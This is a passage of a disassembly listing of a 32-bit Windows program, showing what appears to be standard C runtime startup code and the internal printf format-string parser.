mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_418626
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_4185E7 endp
; =============== S U B R O U T I N E =======================================
sub_418626 proc near ; CODE XREF: sub_4185E7+31�p
; DATA XREF: .text:stru_42BE78�o
push dword ptr [ebp+8]
call sub_41B154
pop ecx
retn
sub_418626 endp
; =============== S U B R O U T I N E =======================================
sub_418630 proc near ; CODE XREF: sub_414199+75�p
; sub_414199+85�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp word ptr [eax], 0
mov edx, eax
jz short loc_418644
loc_41863C: ; CODE XREF: sub_418630+12�j
inc edx
inc edx
cmp word ptr [edx], 0
jnz short loc_41863C
loc_418644: ; CODE XREF: sub_418630+A�j
push esi
mov esi, [esp+4+arg_4]
loc_418649: ; CODE XREF: sub_418630+26�j
mov cx, [esi]
mov [edx], cx
inc edx
inc edx
inc esi
inc esi
test cx, cx
jnz short loc_418649
pop esi
retn
sub_418630 endp
; =============== S U B R O U T I N E =======================================
sub_41865A proc near ; CODE XREF: .text:004187A2�p
; .text:004187C8�p ...
arg_0 = dword ptr 4
cmp dword_4811D0, 1
jnz short loc_418668
call sub_41DADE
loc_418668: ; CODE XREF: sub_41865A+7�j
push [esp+arg_0]
call sub_41D967
push 0FFh
call off_432380
pop ecx
pop ecx
retn
sub_41865A endp
; =============== S U B R O U T I N E =======================================
sub_41867F proc near ; CODE XREF: .text:00418778�p
; .text:00418789�p
arg_0 = dword ptr 4
cmp dword_4811D0, 1
jnz short loc_41868D
call sub_41DADE
loc_41868D: ; CODE XREF: sub_41867F+7�j
push [esp+arg_0]
call sub_41D967
push 0FFh
call sub_4182A9
pop ecx
pop ecx
retn
sub_41867F endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_42BE88
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_416B90
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call dword_422120 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_481184, ecx
mov eax, [esi+4]
mov dword_481190, eax
mov edx, [esi+8]
mov dword_481194, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_481188, esi
cmp ecx, 2
jz short loc_418703
or esi, 8000h
mov dword_481188, esi
loc_418703: ; CODE XREF: .text:004186F5�j
shl eax, 8
add eax, edx
mov dword_48118C, eax
xor esi, esi
push esi
mov edi, dword_4220A4
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_41873E
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_41873E
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_418756
cmp eax, 20Bh
jz short loc_418743
loc_41873E: ; CODE XREF: .text:0041871D�j
; .text:0041872A�j ...
mov [ebp-1Ch], esi
jmp short loc_41876A
; ---------------------------------------------------------------------------
loc_418743: ; CODE XREF: .text:0041873C�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_41873E
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_418764
; ---------------------------------------------------------------------------
loc_418756: ; CODE XREF: .text:00418735�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_41873E
xor eax, eax
cmp [ecx+0E8h], esi
loc_418764: ; CODE XREF: .text:00418754�j
setnz al
mov [ebp-1Ch], eax
loc_41876A: ; CODE XREF: .text:00418741�j
push 1
call sub_41A053
pop ecx
test eax, eax
jnz short loc_41877E
push 1Ch
call sub_41867F
pop ecx
loc_41877E: ; CODE XREF: .text:00418774�j
call sub_419240
test eax, eax
jnz short loc_41878F
push 10h
call sub_41867F
pop ecx
loc_41878F: ; CODE XREF: .text:00418785�j
call sub_41D65E
mov [ebp-4], esi
call sub_41E0DB
test eax, eax
jge short loc_4187A8
push 1Bh
call sub_41865A
pop ecx
loc_4187A8: ; CODE XREF: .text:0041879E�j
call dword_42216C ; GetCommandLineA
mov dword_482988, eax
call sub_41DFB9
mov dword_4811C8, eax
call sub_41DF17
test eax, eax
jge short loc_4187CE
push 8
call sub_41865A
pop ecx
loc_4187CE: ; CODE XREF: .text:004187C4�j
call sub_41DCE4
test eax, eax
jge short loc_4187DF
push 9
call sub_41865A
pop ecx
loc_4187DF: ; CODE XREF: .text:004187D5�j
call sub_4182EB
mov [ebp-20h], eax
cmp eax, esi
jz short loc_4187F2
push eax
call sub_41865A
pop ecx
loc_4187F2: ; CODE XREF: .text:004187E9�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call dword_422168 ; GetStartupInfoA
call sub_41DC7B
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_418813
movzx eax, word ptr [ebp-34h]
jmp short loc_418816
; ---------------------------------------------------------------------------
loc_418813: ; CODE XREF: .text:0041880B�j
push 0Ah
pop eax
loc_418816: ; CODE XREF: .text:00418811�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40FB4C
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_418834
push edi
call sub_418423
loc_418834: ; CODE XREF: .text:0041882C�j
call sub_418445
jmp short loc_418866
; ---------------------------------------------------------------------------
loc_41883B: ; DATA XREF: .text:stru_42BE88�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_41DB17
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41884F: ; DATA XREF: .text:stru_42BE88�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_418861
push edi
call sub_418434
loc_418861: ; CODE XREF: .text:00418859�j
call sub_418454
loc_418866: ; CODE XREF: .text:00418839�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418875 proc near ; CODE XREF: sub_416975+4B�p
; sub_416BCD+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_418981
test al, 40h
jnz loc_418981
test al, 1
jz short loc_4188AE
and dword ptr [esi+4], 0
test al, 10h
jz loc_418981
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_4188AE: ; CODE XREF: sub_418875+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_4188EA
cmp esi, offset dword_432678
jz short loc_4188D8
cmp esi, offset dword_432698
jnz short loc_4188E3
loc_4188D8: ; CODE XREF: sub_418875+59�j
push ebx
call sub_41E56D
test eax, eax
pop ecx
jnz short loc_4188EA
loc_4188E3: ; CODE XREF: sub_418875+61�j
push esi
call sub_41E529
pop ecx
loc_4188EA: ; CODE XREF: sub_418875+51�j
; sub_418875+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_418957
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_418917
push edi
push eax
push ebx
call sub_41E47E
mov [ebp+arg_4], eax
jmp short loc_41894A
; ---------------------------------------------------------------------------
loc_418917: ; CODE XREF: sub_418875+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_418935
mov ecx, ebx
sar ecx, 5
mov ecx, dword_481600[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_41893A
; ---------------------------------------------------------------------------
loc_418935: ; CODE XREF: sub_418875+A5�j
mov eax, offset dword_432C90
loc_41893A: ; CODE XREF: sub_418875+BE�j
test byte ptr [eax+4], 20h
jz short loc_41894D
push 2
push 0
push ebx
call sub_41D75A
loc_41894A: ; CODE XREF: sub_418875+A0�j
add esp, 0Ch
loc_41894D: ; CODE XREF: sub_418875+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41896B
; ---------------------------------------------------------------------------
loc_418957: ; CODE XREF: sub_418875+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41E47E
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41896B: ; CODE XREF: sub_418875+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_418977
or dword ptr [esi+0Ch], 20h
jmp short loc_418987
; ---------------------------------------------------------------------------
loc_418977: ; CODE XREF: sub_418875+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41898A
; ---------------------------------------------------------------------------
loc_418981: ; CODE XREF: sub_418875+10�j
; sub_418875+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_418987: ; CODE XREF: sub_418875+100�j
or eax, 0FFFFFFFFh
loc_41898A: ; CODE XREF: sub_418875+10A�j
pop esi
pop ebx
pop ebp
retn
sub_418875 endp
; =============== S U B R O U T I N E =======================================
sub_41898E proc near ; CODE XREF: sub_4189C1+11�p
; sub_4189E5+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_41899A
cmp dword ptr [ecx+8], 0
jz short loc_4189BE
loc_41899A: ; CODE XREF: sub_41898E+4�j
dec dword ptr [ecx+4]
js short loc_4189AA
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4189B6
; ---------------------------------------------------------------------------
loc_4189AA: ; CODE XREF: sub_41898E+F�j
movsx eax, al
push ecx
push eax
call sub_418875
pop ecx
pop ecx
loc_4189B6: ; CODE XREF: sub_41898E+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_4189BE
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_4189BE: ; CODE XREF: sub_41898E+A�j
; sub_41898E+2B�j
inc dword ptr [esi]
retn
sub_41898E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189C1 proc near ; CODE XREF: sub_418A1C+6A2�p
; sub_418A1C+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_4189DC
; ---------------------------------------------------------------------------
loc_4189C9: ; CODE XREF: sub_4189C1+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_41898E
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4189E2
loc_4189DC: ; CODE XREF: sub_4189C1+6�j
cmp [ebp+arg_4], 0
jg short loc_4189C9
loc_4189E2: ; CODE XREF: sub_4189C1+19�j
pop esi
pop ebp
retn
sub_4189C1 endp
; =============== S U B R O U T I N E =======================================
sub_4189E5 proc near ; CODE XREF: sub_418A1C+6B6�p
; sub_418A1C+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_418A12
cmp dword ptr [edi+8], 0
jnz short loc_418A12
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_418A19
; ---------------------------------------------------------------------------
loc_4189FF: ; CODE XREF: sub_4189E5+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_41898E
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_418A19
loc_418A12: ; CODE XREF: sub_4189E5+A�j
; sub_4189E5+10�j
cmp [esp+8+arg_0], 0
jg short loc_4189FF
loc_418A19: ; CODE XREF: sub_4189E5+18�j
; sub_4189E5+2B�j
pop esi
pop ebx
retn
sub_4189E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A1C proc near ; CODE XREF: sub_416975+2A�p
; sub_416BCD+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_419180
push esi
push edi
mov edi, eax
jmp short loc_418A54
; ---------------------------------------------------------------------------
loc_418A51: ; CODE XREF: sub_418A1C+75C�j
mov ecx, [ebp+var_38]
loc_418A54: ; CODE XREF: sub_418A1C+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_41917E
cmp bl, 20h
jl short loc_418A7B
cmp bl, 78h
jg short loc_418A7B
movsx eax, bl
movsx eax, byte ptr stru_42BE78._unk[eax]
and eax, 0Fh
jmp short loc_418A7D
; ---------------------------------------------------------------------------
loc_418A7B: ; CODE XREF: sub_418A1C+49�j
; sub_418A1C+4E�j
xor eax, eax
loc_418A7D: ; CODE XREF: sub_418A1C+5D�j
movsx eax, byte_42BE98[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_419171 ; default
jmp off_419191[eax*4] ; switch jump
loc_418A9D: ; DATA XREF: .text:off_419191�o
xor eax, eax ; jumptable 00418A96 case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418ABA: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
movsx eax, bl ; jumptable 00418A96 case 2
sub eax, 20h
jz short loc_418AFD
sub eax, 3
jz short loc_418AF4
sub eax, 8
jz short loc_418AEB
dec eax
dec eax
jz short loc_418AE2
sub eax, 3
jnz loc_419171 ; default
or [ebp+var_8], 8
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418AE2: ; CODE XREF: sub_418A1C+B2�j
or [ebp+var_8], 4
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418AEB: ; CODE XREF: sub_418A1C+AE�j
or [ebp+var_8], 1
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418AF4: ; CODE XREF: sub_418A1C+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418AFD: ; CODE XREF: sub_418A1C+A4�j
or [ebp+var_8], 2
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B06: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
cmp bl, 2Ah ; jumptable 00418A96 case 3
jnz short loc_418B2C
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_419171 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B2C: ; CODE XREF: sub_418A1C+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B41: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
and [ebp+var_C], 0 ; jumptable 00418A96 case 4
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B4A: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
cmp bl, 2Ah ; jumptable 00418A96 case 5
jnz short loc_418B6D
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_419171 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B6D: ; CODE XREF: sub_418A1C+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418B82: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
cmp bl, 49h ; jumptable 00418A96 case 6
jz short loc_418BB5
cmp bl, 68h
jz short loc_418BAC
cmp bl, 6Ch
jz short loc_418BA3
cmp bl, 77h
jnz loc_419171 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418BA3: ; CODE XREF: sub_418A1C+173�j
or [ebp+var_8], 10h
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418BAC: ; CODE XREF: sub_418A1C+16E�j
or [ebp+var_8], 20h
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418BB5: ; CODE XREF: sub_418A1C+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_418BCF
cmp byte ptr [edi+1], 34h
jnz short loc_418BCF
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418BCF: ; CODE XREF: sub_418A1C+19D�j
; sub_418A1C+1A3�j
cmp al, 33h
jnz short loc_418BE7
cmp byte ptr [edi+1], 32h
jnz short loc_418BE7
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418BE7: ; CODE XREF: sub_418A1C+1B5�j
; sub_418A1C+1BB�j
cmp al, 64h
jz loc_419171 ; default
cmp al, 69h
jz loc_419171 ; default
cmp al, 6Fh
jz loc_419171 ; default
cmp al, 75h
jz loc_419171 ; default
cmp al, 78h
jz loc_419171 ; default
cmp al, 58h
jz loc_419171 ; default
and [ebp+var_38], 0
loc_418C1B: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
mov ecx, off_432A60 ; jumptable 00418A96 case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_418C42
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_41898E
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_418C42: ; CODE XREF: sub_418A1C+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_41898E
jmp loc_419171 ; default
; ---------------------------------------------------------------------------
loc_418C54: ; CODE XREF: sub_418A1C+7A�j
; DATA XREF: .text:off_419191�o
movsx eax, bl ; jumptable 00418A96 case 7
cmp eax, 67h
jg loc_418EA6
cmp eax, 65h
jge loc_418CE9
cmp eax, 58h
jg loc_418D4A
jz loc_418F27
sub eax, 43h
jz loc_418D0C
dec eax
dec eax
jz short loc_418CDF
dec eax
dec eax
jz short loc_418CDF
sub eax, 0Ch
jnz loc_41906F
test word ptr [ebp+var_8], 830h
jnz short loc_418C9E
or byte ptr [ebp+var_8+1], 8
loc_418C9E: ; CODE XREF: sub_418A1C+27C�j
; sub_418A1C+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_418CAB
mov ecx, 7FFFFFFFh
loc_418CAB: ; CODE XREF: sub_418A1C+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_418EFC
test eax, eax
jnz short loc_418CD0
mov eax, off_43238C
mov [ebp+var_10], eax
loc_418CD0: ; CODE XREF: sub_418A1C+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_418EEE
; ---------------------------------------------------------------------------
loc_418CDF: ; CODE XREF: sub_418A1C+267�j
; sub_418A1C+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_418CE9: ; CODE XREF: sub_418A1C+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_418DF0
mov [ebp+var_C], 6
jmp loc_418E37
; ---------------------------------------------------------------------------
loc_418D0C: ; CODE XREF: sub_418A1C+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_418D18
or byte ptr [ebp+var_8+1], 8
loc_418D18: ; CODE XREF: sub_418A1C+2F6�j
; sub_418A1C+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_418D89
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41E5F7
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_418D99
mov [ebp+var_34], 1
jmp short loc_418D99
; ---------------------------------------------------------------------------
loc_418D4A: ; CODE XREF: sub_418A1C+250�j
sub eax, 5Ah
jz short loc_418DA7
sub eax, 9
jz short loc_418D18
dec eax
jnz loc_41906F
loc_418D5B: ; CODE XREF: sub_418A1C+48D�j
or [ebp+var_8], 40h
loc_418D5F: ; CODE XREF: sub_418A1C+4B1�j
mov [ebp+var_14], 0Ah
loc_418D66: ; CODE XREF: sub_418A1C+519�j
; sub_418A1C+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_418F97
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_418FBF
; ---------------------------------------------------------------------------
loc_418D89: ; CODE XREF: sub_418A1C+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_418D99: ; CODE XREF: sub_418A1C+323�j
; sub_418A1C+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_41906F
; ---------------------------------------------------------------------------
loc_418DA7: ; CODE XREF: sub_418A1C+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_418DE2
mov ecx, [eax+4]
test ecx, ecx
jz short loc_418DE2
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_418DD9
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_41906C
; ---------------------------------------------------------------------------
loc_418DD9: ; CODE XREF: sub_418A1C+3AA�j
and [ebp+var_28], 0
jmp loc_41906C
; ---------------------------------------------------------------------------
loc_418DE2: ; CODE XREF: sub_418A1C+397�j
; sub_418A1C+39E�j
mov eax, off_432388
mov [ebp+var_10], eax
push eax
jmp loc_418E9B
; ---------------------------------------------------------------------------
loc_418DF0: ; CODE XREF: sub_418A1C+2DE�j
jnz short loc_418E00
cmp bl, 67h
jnz short loc_418E37
mov [ebp+var_C], 1
jmp short loc_418E37
; ---------------------------------------------------------------------------
loc_418E00: ; CODE XREF: sub_418A1C:loc_418DF0�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_418E0D
mov [ebp+var_C], eax
loc_418E0D: ; CODE XREF: sub_418A1C+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_418E37
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_416E1F
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_418E34
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_418E37
; ---------------------------------------------------------------------------
loc_418E34: ; CODE XREF: sub_418A1C+40F�j
mov [ebp+var_C], edi
loc_418E37: ; CODE XREF: sub_418A1C+2EB�j
; sub_418A1C+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_432A48
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_418E7C
cmp [ebp+var_C], 0
jnz short loc_418E7C
push esi
call off_432A54
pop ecx
loc_418E7C: ; CODE XREF: sub_418A1C+450�j
; sub_418A1C+456�j
cmp bl, 67h
jnz short loc_418E8D
test edi, edi
jnz short loc_418E8D
push esi
call off_432A4C
pop ecx
loc_418E8D: ; CODE XREF: sub_418A1C+463�j
; sub_418A1C+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_418E9A
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_418E9A: ; CODE XREF: sub_418A1C+474�j
push esi
loc_418E9B: ; CODE XREF: sub_418A1C+3CF�j
call sub_419D70
pop ecx
jmp loc_41906C
; ---------------------------------------------------------------------------
loc_418EA6: ; CODE XREF: sub_418A1C+23E�j
sub eax, 69h
jz loc_418D5B
sub eax, 5
jz loc_418F6D
dec eax
jz loc_418F53
dec eax
jz short loc_418F20
sub eax, 3
jz loc_418C9E
dec eax
dec eax
jz loc_418D5F
sub eax, 3
jnz loc_41906F
mov [ebp+var_30], 27h
jmp short loc_418F2A
; ---------------------------------------------------------------------------
loc_418EE5: ; CODE XREF: sub_418A1C+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_418EF2
inc eax
inc eax
loc_418EEE: ; CODE XREF: sub_418A1C+2BE�j
test ecx, ecx
jnz short loc_418EE5
loc_418EF2: ; CODE XREF: sub_418A1C+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_41906C
; ---------------------------------------------------------------------------
loc_418EFC: ; CODE XREF: sub_418A1C+2A2�j
test eax, eax
jnz short loc_418F08
mov eax, off_432388
mov [ebp+var_10], eax
loc_418F08: ; CODE XREF: sub_418A1C+4E2�j
mov eax, [ebp+var_10]
jmp short loc_418F14
; ---------------------------------------------------------------------------
loc_418F0D: ; CODE XREF: sub_418A1C+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_418F18
inc eax
loc_418F14: ; CODE XREF: sub_418A1C+4EF�j
test ecx, ecx
jnz short loc_418F0D
loc_418F18: ; CODE XREF: sub_418A1C+4F5�j
sub eax, [ebp+var_10]
jmp loc_41906C
; ---------------------------------------------------------------------------
loc_418F20: ; CODE XREF: sub_418A1C+4A4�j
mov [ebp+var_C], 8
loc_418F27: ; CODE XREF: sub_418A1C+256�j
mov [ebp+var_30], ecx
loc_418F2A: ; CODE XREF: sub_418A1C+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_418D66
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_418D66
; ---------------------------------------------------------------------------
loc_418F53: ; CODE XREF: sub_418A1C+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_418D66
or byte ptr [ebp+var_8+1], 2
jmp loc_418D66
; ---------------------------------------------------------------------------
loc_418F6D: ; CODE XREF: sub_418A1C+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_418F86
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_418F8B
; ---------------------------------------------------------------------------
loc_418F86: ; CODE XREF: sub_418A1C+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_418F8B: ; CODE XREF: sub_418A1C+568�j
mov [ebp+var_34], 1
jmp loc_41915E
; ---------------------------------------------------------------------------
loc_418F97: ; CODE XREF: sub_418A1C+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_418FB5
test bl, 40h
jz short loc_418FAF
movsx eax, word ptr [eax-4]
loc_418FAC: ; CODE XREF: sub_418A1C+597�j
; sub_418A1C+59F�j
cdq
jmp short loc_418FBF
; ---------------------------------------------------------------------------
loc_418FAF: ; CODE XREF: sub_418A1C+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_418FAC
; ---------------------------------------------------------------------------
loc_418FB5: ; CODE XREF: sub_418A1C+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_418FAC
xor edx, edx
loc_418FBF: ; CODE XREF: sub_418A1C+368�j
; sub_418A1C+591�j
test bl, 40h
jz short loc_418FD9
test edx, edx
jg short loc_418FD9
jl short loc_418FCE
test eax, eax
jnb short loc_418FD9
loc_418FCE: ; CODE XREF: sub_418A1C+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_418FD9: ; CODE XREF: sub_418A1C+5A6�j
; sub_418A1C+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_418FE4
xor edi, edi
loc_418FE4: ; CODE XREF: sub_418A1C+5C4�j
cmp [ebp+var_C], 0
jge short loc_418FF3
mov [ebp+var_C], 1
jmp short loc_419004
; ---------------------------------------------------------------------------
